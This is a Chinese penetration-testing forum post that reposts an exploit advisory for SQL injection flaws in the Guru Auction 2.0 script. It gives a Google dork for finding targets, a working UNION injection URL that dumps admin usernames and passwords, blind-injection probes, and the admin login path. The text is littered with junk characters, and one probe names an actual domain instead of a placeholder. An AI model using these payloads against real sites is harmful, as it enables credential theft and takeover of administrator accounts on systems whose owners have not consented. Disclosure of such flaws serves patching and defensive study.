中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]
作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities$ A: N' X1 A" ?' {
3 ~  i( a- b, O& U1 z
作者     : v3n0m( H2 d7 t/ w  M/ u" w/ Y! [6 J
应用 : Guru Auction 2.02 L  t' a* W1 E% D! W% `
Price       : $490 Q* x6 P6 P& h% B2 U
Vendor      : http://www.guruscript.com/( ]2 w3 }/ L; n( G0 ^, Q- L- E
Google Dork : inurl:subcat.php?cate_id=
9 g. e8 `$ e4 t" Q6 F : y. @# ]& i; i$ B* |! B
SQLi p0c:
( N7 o& b  `$ X* U~~~~~~~~~~; y& ?) B/ S+ Z1 M0 z0 C; x) {: _* [
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
4 Q6 L% ^/ D) j' k# G; ~* V
( K9 a( s. U1 N. b
  N5 B) s5 ?: x1 w$ i+ Y盲注 p0c:# |$ [8 D6 f6 Y8 n1 f# ~
~~~~~~~~~~
& i& S3 i; x/ O" A( O! Fhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true! v5 C# J( o, A" O- c
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
# w( W' K) R0 ?3 g5 {( H! c
8 n" ]3 e$ _% k" l管理登录入口:
6 v" {4 A. ?! d2 ^4 q~~~~~~~~~~
* R& n" w; P; ohttp://domain.tld/[path]/admin/9 y4 v7 e3 V4 @8 Q. R2 E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2